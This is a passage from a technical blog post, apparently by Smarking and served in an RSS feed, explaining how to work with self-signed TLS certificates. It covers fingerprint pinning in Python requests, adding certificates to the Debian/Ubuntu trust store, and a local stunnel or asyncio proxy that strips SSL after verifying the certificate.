&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;requests.adapters&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;HTTPAdapter&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;FingerprintAdapter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;HTTPAdapter&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="s"&gt;"""
  A TransportAdapter that verifies server certificates by fingerprint.
  """&lt;/span&gt;
  &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_fingerprint&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;
    &lt;span class="n"&gt;HTTPAdapter&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;init_poolmanager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;'assert_fingerprint'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_fingerprint&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;super&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="n"&gt;init_poolmanager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

  &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;proxy_manager_for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;'assert_fingerprint'&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;_fingerprint&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nb"&gt;super&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="n"&gt;proxy_manager_for&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;kwargs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In summary, set &lt;code&gt;verify=True&lt;/code&gt; when working with certificates signed by a trusted CA; otherwise, set &lt;code&gt;verify=False&lt;/code&gt; and mount a &lt;code&gt;FingerprintAdapter&lt;/code&gt; to verify self-signed certificates by fingerprint. Test that the verification works by altering the fingerprint value and checking that the request fails with a security error (&lt;code&gt;requests.exceptions.SSLError&lt;/code&gt;).&lt;/p&gt;
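
&lt;p&gt;The negative test suggested above can be wrapped in a small helper. This is a sketch under assumptions: &lt;code&gt;tamper&lt;/code&gt; and &lt;code&gt;pin_is_enforced&lt;/code&gt; are hypothetical names, and &lt;code&gt;fetch&lt;/code&gt; stands for any callable that makes a request pinned to the fingerprint it is given.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;def tamper(fingerprint):
    """Hypothetical helper: return the fingerprint with its last hex digit changed."""
    replacement = "1" if fingerprint[-1] == "0" else "0"
    return fingerprint[:-1] + replacement


def pin_is_enforced(fetch, fingerprint, error_type):
    """Call fetch() with the real pin, then with a tampered one.

    Returns True only if the real pin succeeds and the tampered pin
    raises error_type.
    """
    fetch(fingerprint)  # must not raise
    try:
        fetch(tamper(fingerprint))
    except error_type:
        return True
    return False
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With the session factory from this article, a check might look like &lt;code&gt;pin_is_enforced(lambda fp: create_fingerprint_session(url, fp).get(url), fingerprint, requests.exceptions.SSLError)&lt;/code&gt;. Each call builds a fresh session, so a pooled connection opened under the real fingerprint is not reused for the tampered one.&lt;/p&gt;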

&lt;h2&gt;
  
  
  Method #2: Site-wide
&lt;/h2&gt;

&lt;p&gt;What if you wished to use other tools, besides Python, to query websites that use self-signed certificates? A site-wide solution is to add the self-signed certificate to the system's list of trusted certificates. Once it is there, the verifier treats it as trusted and performs no further signature checking.&lt;/p&gt;

&lt;p&gt;However, the downside of this method is that if the third party's private key were compromised, it could be used to sign certificates for any domain, and all programs on the machine would trust them. This is a significant security risk for a long-lived server, but it may be tolerable if "site-wide" does not extend beyond a Docker container that runs a program connecting to only one endpoint.&lt;/p&gt;

&lt;p&gt;The following instructions are for Ubuntu or Debian; for other distributions, make necessary adjustments. &lt;/p&gt;

&lt;p&gt;Look in the directory &lt;code&gt;/usr/share/ca-certificates&lt;/code&gt; and you will see the subdirectory &lt;code&gt;mozilla&lt;/code&gt;, with many certificate files inside it. Make your own subdirectory at the same nesting level, for instance, &lt;code&gt;/usr/share/ca-certificates/custom&lt;/code&gt;, and put the self-signed certificates of interest in it in PEM format, stored as separate files with the extension &lt;code&gt;.crt&lt;/code&gt;. Next, edit &lt;code&gt;/etc/ca-certificates.conf&lt;/code&gt; and list the custom certificates, with paths relative to &lt;code&gt;/usr/share/ca-certificates&lt;/code&gt;, after the &lt;code&gt;mozilla&lt;/code&gt; certificates. For instance,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;...
mozilla/USERTrust_RSA_Certification_Authority.crt
custom/example-com-self-signed.crt
custom/another-example-com-self-signed.crt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Next, run the &lt;code&gt;update-ca-certificates&lt;/code&gt; command as root. Once it finishes, symlinks to your certificates appear in the &lt;code&gt;/etc/ssl/certs&lt;/code&gt; directory. At this point, &lt;code&gt;curl&lt;/code&gt; accepts the self-signed certificate from &lt;code&gt;example.com&lt;/code&gt;.&lt;/p&gt;
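
&lt;p&gt;The manual steps above can be scripted. The following is a sketch, assuming the Debian/Ubuntu paths described in this section and root privileges; &lt;code&gt;install_custom_cert&lt;/code&gt; is a hypothetical helper, and its directory and file arguments exist so that it can be tried against a scratch directory first.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import shutil
import subprocess
from pathlib import Path

# Debian/Ubuntu locations described above; adjust for other distributions.
SHARE_DIR = Path("/usr/share/ca-certificates")
CONF_PATH = Path("/etc/ca-certificates.conf")


def install_custom_cert(cert_file, share_dir=SHARE_DIR, conf_path=CONF_PATH,
                        run_update=True):
    """Copy a PEM certificate into share_dir/custom and list it in conf_path.

    Hypothetical helper; needs root when used with the default paths.
    """
    cert_file = Path(cert_file)
    name = cert_file.stem + ".crt"  # store with the .crt extension
    custom_dir = Path(share_dir) / "custom"
    custom_dir.mkdir(parents=True, exist_ok=True)
    shutil.copyfile(cert_file, custom_dir / name)

    # Entries in ca-certificates.conf are relative to share_dir;
    # appending puts the custom entry after the mozilla ones.
    entry = "custom/" + name
    conf_path = Path(conf_path)
    lines = conf_path.read_text().splitlines() if conf_path.exists() else []
    if entry not in lines:
        lines.append(entry)
        conf_path.write_text("\n".join(lines) + "\n")

    if run_update:
        # Refreshes the symlinks in /etc/ssl/certs.
        subprocess.run(["update-ca-certificates"], check=True)
    return entry
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;For instance, &lt;code&gt;install_custom_cert('example-com-self-signed.pem')&lt;/code&gt; would copy the file to &lt;code&gt;/usr/share/ca-certificates/custom/example-com-self-signed.crt&lt;/code&gt;, append &lt;code&gt;custom/example-com-self-signed.crt&lt;/code&gt; to the configuration file if it is not already listed, and then run &lt;code&gt;update-ca-certificates&lt;/code&gt;.&lt;/p&gt;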

&lt;p&gt;However, the fingerprint method described previously has the advantage of working even when there is a domain name mismatch. A mismatch happens if you query the target HTTPS server by its IP address (e.g. &lt;code&gt;https://1.2.3.4/a/b/&lt;/code&gt;). If this is your situation, add an entry to the &lt;code&gt;/etc/hosts&lt;/code&gt; file so that you can query the web server by the precise domain name listed inside the self-signed certificate.&lt;/p&gt;
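
&lt;p&gt;For instance, with the placeholder address and domain name used in this article, the &lt;code&gt;/etc/hosts&lt;/code&gt; entry would be the following line; substitute your server's IP address and the exact name from its certificate:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1.2.3.4    example.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Afterwards, requests to &lt;code&gt;https://example.com/a/b/&lt;/code&gt; reach &lt;code&gt;1.2.3.4&lt;/code&gt;, and the requested name matches the one in the certificate.&lt;/p&gt;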

&lt;p&gt;The site-wide method works for tools that use the system certificate store, such as &lt;code&gt;curl&lt;/code&gt; and other programs built on OpenSSL. However, it is not sufficient for Python's &lt;code&gt;requests&lt;/code&gt; library, which, when installed with pip, verifies certificates against the CA bundle shipped with the &lt;code&gt;certifi&lt;/code&gt; package rather than the system store.&lt;/p&gt;
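
&lt;p&gt;When installed with pip, &lt;code&gt;requests&lt;/code&gt; verifies against the bundle from &lt;code&gt;certifi&lt;/code&gt;, but it also honors the &lt;code&gt;REQUESTS_CA_BUNDLE&lt;/code&gt; environment variable. The sketch below assumes the Debian/Ubuntu bundle file that &lt;code&gt;update-ca-certificates&lt;/code&gt; regenerates, &lt;code&gt;/etc/ssl/certs/ca-certificates.crt&lt;/code&gt;; the helper names are hypothetical. Default contexts from the standard library's &lt;code&gt;ssl.create_default_context()&lt;/code&gt;, by contrast, load OpenSSL's default locations, which the second helper reports.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import os
import ssl

# Assumption: Debian/Ubuntu, where update-ca-certificates maintains this bundle.
SYSTEM_BUNDLE = "/etc/ssl/certs/ca-certificates.crt"


def trust_system_store_in_requests(bundle=SYSTEM_BUNDLE):
    """Make requests verify against the system bundle instead of certifi's.

    requests reads REQUESTS_CA_BUNDLE from the environment when the
    session's trust_env attribute is True (the default).
    """
    os.environ["REQUESTS_CA_BUNDLE"] = bundle
    return bundle


def openssl_default_locations():
    """Return the CA file and directory compiled into OpenSSL, which
    ssl.create_default_context() loads on Linux unless the SSL_CERT_FILE
    or SSL_CERT_DIR environment variables override them."""
    paths = ssl.get_default_verify_paths()
    return paths.openssl_cafile, paths.openssl_capath
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Setting the variable in the shell (&lt;code&gt;export REQUESTS_CA_BUNDLE=/etc/ssl/certs/ca-certificates.crt&lt;/code&gt;) has the same effect. The hostname check still applies in either case, so the &lt;code&gt;/etc/hosts&lt;/code&gt; advice above remains relevant.&lt;/p&gt;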

&lt;h2&gt;
  
  
  Method #3: Strip SSL
&lt;/h2&gt;

&lt;p&gt;Another way to let a variety of tools access HTTPS websites that use self-signed certificates is to go through a trusted &lt;em&gt;proxy&lt;/em&gt; server that strips the SSL layer after verifying the self-signed certificates by their fingerprints. We could implement such a proxy server in Python using the techniques above. Alternatively, we could use a utility program called &lt;code&gt;stunnel&lt;/code&gt;, which stands for the "Universal SSL Tunnel."&lt;/p&gt;
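
&lt;p&gt;Before turning to &lt;code&gt;stunnel&lt;/code&gt;, here is a minimal sketch of the do-it-yourself option, using only the standard library. It is a stand-in under assumptions rather than a full proxy: it forwards raw bytes, as &lt;code&gt;stunnel&lt;/code&gt; does in client mode, instead of parsing HTTP; it pins a SHA-256 fingerprint; and its settings (address, ports, SNI name, elided fingerprint) are hypothetical values that mirror the &lt;code&gt;stunnel&lt;/code&gt; example in this section.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;import asyncio
import hashlib
import hmac
import ssl

# Hypothetical settings mirroring the stunnel example in this section.
LISTEN_HOST = "127.0.0.1"    # plain-text side: reachable from this machine only
LISTEN_PORT = 8081
UPSTREAM_HOST = "1.2.3.4"    # placeholder address of the HTTPS server
UPSTREAM_PORT = 443
SNI = "example.com"
PINNED_SHA256 = "14:71:..."  # elided; put the full SHA-256 fingerprint here


def matches_pin(der_bytes, pinned):
    """True if the certificate's SHA-256 digest equals the pinned fingerprint."""
    expected = pinned.replace(":", "").lower()
    actual = hashlib.sha256(der_bytes).hexdigest()
    return hmac.compare_digest(actual, expected)


async def pipe(reader, writer):
    """Copy bytes from reader to writer until EOF, then close writer."""
    try:
        while True:
            data = await reader.read(65536)
            if not data:
                break
            writer.write(data)
            await writer.drain()
    except ConnectionError:
        pass  # the other side went away
    finally:
        writer.close()


async def handle_client(client_reader, client_writer):
    # Skip CA-chain and hostname checks; the pin below replaces them.
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    up_reader, up_writer = await asyncio.open_connection(
        UPSTREAM_HOST, UPSTREAM_PORT, ssl=ctx, server_hostname=SNI)
    der = up_writer.get_extra_info("ssl_object").getpeercert(binary_form=True)
    if der is None or not matches_pin(der, PINNED_SHA256):
        # Unknown certificate: forward nothing in either direction.
        up_writer.close()
        client_writer.close()
        return
    await asyncio.gather(pipe(client_reader, up_writer),
                         pipe(up_reader, client_writer))


async def main():
    server = await asyncio.start_server(handle_client, LISTEN_HOST, LISTEN_PORT)
    async with server:
        await server.serve_forever()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Start it with &lt;code&gt;asyncio.run(main())&lt;/code&gt;; clients then speak plain HTTP to &lt;code&gt;http://localhost:8081&lt;/code&gt;. Binding the listener to &lt;code&gt;127.0.0.1&lt;/code&gt; keeps the unencrypted side off the network.&lt;/p&gt;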

&lt;p&gt;First, prepare a &lt;code&gt;connection.conf&lt;/code&gt; configuration file like this one:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;pid = /var/run/stunnel1.pid
CApath = /etc/ssl/certs
foreground=yes

[connection1]
verifyChain=no
verifyPeer=yes
client=yes
accept=8081
connect=1.2.3.4:443
sni=example.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then, run &lt;code&gt;stunnel&lt;/code&gt; with the configuration file as its argument to have &lt;code&gt;https://example.com&lt;/code&gt; proxied as &lt;code&gt;http://localhost:8081&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;stunnel connection.conf &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&amp;amp; output.log &amp;amp;
&lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="s1"&gt;'http://localhost:8081/a/b/c'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
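
&lt;p&gt;The &lt;code&gt;sni&lt;/code&gt; option only affects the TLS handshake. The HTTP &lt;code&gt;Host&lt;/code&gt; header still comes from the client, and the &lt;code&gt;curl&lt;/code&gt; command above sends &lt;code&gt;Host: localhost:8081&lt;/code&gt;. If the server selects virtual hosts by that header (an assumption about your server), set it explicitly, for example with &lt;code&gt;curl -H 'Host: example.com'&lt;/code&gt;, or from Python as in this sketch, where &lt;code&gt;fetch_via_tunnel&lt;/code&gt; is a hypothetical helper:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;from urllib.request import ProxyHandler, Request, build_opener


def fetch_via_tunnel(path, local_port=8081, virtual_host="example.com"):
    """GET path through the local stunnel endpoint with an explicit Host header."""
    url = "http://localhost:{}{}".format(local_port, path)
    # sni only covers the TLS handshake; the Host header comes from us.
    request = Request(url, headers={"Host": virtual_host})
    # An empty ProxyHandler ignores http_proxy, so we talk to the tunnel directly.
    opener = build_opener(ProxyHandler({}))
    with opener.open(request, timeout=30) as response:
        return response.read().decode()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;For example, &lt;code&gt;fetch_via_tunnel('/a/b/c')&lt;/code&gt; requests the same page as the &lt;code&gt;curl&lt;/code&gt; command, but presents &lt;code&gt;example.com&lt;/code&gt; as the virtual host.&lt;/p&gt;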



&lt;p&gt;An important thing to notice in the example configuration file is the pair of options &lt;code&gt;verifyChain&lt;/code&gt; and &lt;code&gt;verifyPeer&lt;/code&gt;. Together they skip validation of the signature chain and instead require the server's certificate to match one stored locally in &lt;code&gt;CApath&lt;/code&gt; (here &lt;code&gt;/etc/ssl/certs&lt;/code&gt;, so install the certificate as in Method #2), which pins that exact certificate much like a fingerprint check. These options were added to &lt;code&gt;stunnel&lt;/code&gt; in July 2016, in version 5.34. Notice also that the domain name does not matter: the &lt;code&gt;sni&lt;/code&gt; parameter only tells the web server, during the TLS handshake, which virtual host you are interested in, and it plays no role in validating the certificate.&lt;/p&gt;

&lt;p&gt;To run &lt;code&gt;stunnel&lt;/code&gt; site-wide, make the following configuration changes: store the configuration as &lt;code&gt;/etc/stunnel/stunnel.conf&lt;/code&gt;, remove the &lt;code&gt;foreground=yes&lt;/code&gt; line, set &lt;code&gt;pid&lt;/code&gt; to &lt;code&gt;/var/run/stunnel.pid&lt;/code&gt;, and add more connection sections as needed.&lt;/p&gt;
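
&lt;p&gt;When many servers are involved, the site-wide file can be generated rather than written by hand. Here is a sketch with a hypothetical &lt;code&gt;render_stunnel_conf&lt;/code&gt; helper that applies the changes listed above (no &lt;code&gt;foreground=yes&lt;/code&gt;, &lt;code&gt;pid&lt;/code&gt; set to &lt;code&gt;/var/run/stunnel.pid&lt;/code&gt;) and emits one section per connection:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;# Hypothetical helper; the global options follow the site-wide
# changes described in the text.
GLOBAL_OPTIONS = """pid = /var/run/stunnel.pid
CApath = /etc/ssl/certs
"""

SECTION_TEMPLATE = """
[{name}]
verifyChain=no
verifyPeer=yes
client=yes
accept={accept}
connect={connect}
sni={sni}
"""


def render_stunnel_conf(services):
    """Build stunnel.conf text; services are dicts with the keys
    name, accept, connect and sni (one section per upstream server)."""
    sections = (SECTION_TEMPLATE.format(**service) for service in services)
    return GLOBAL_OPTIONS + "".join(sections)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The output would then be written to &lt;code&gt;/etc/stunnel/stunnel.conf&lt;/code&gt; as root, with each section given its own &lt;code&gt;accept&lt;/code&gt; port.&lt;/p&gt;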

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;We have demonstrated three ways to work with self-signed certificates without compromising security. At Smarking, we are trusted by vendors of parking systems to protect their data, and we use such techniques to justify their trust.&lt;/p&gt;

&lt;p&gt;To learn more about Smarking, visit &lt;a href="https://www.smarking.com/"&gt;www.smarking.com&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>security</category>
      <category>python</category>
      <category>webdev</category>
      <category>devops</category>
    </item>
  </channel>
</rss>
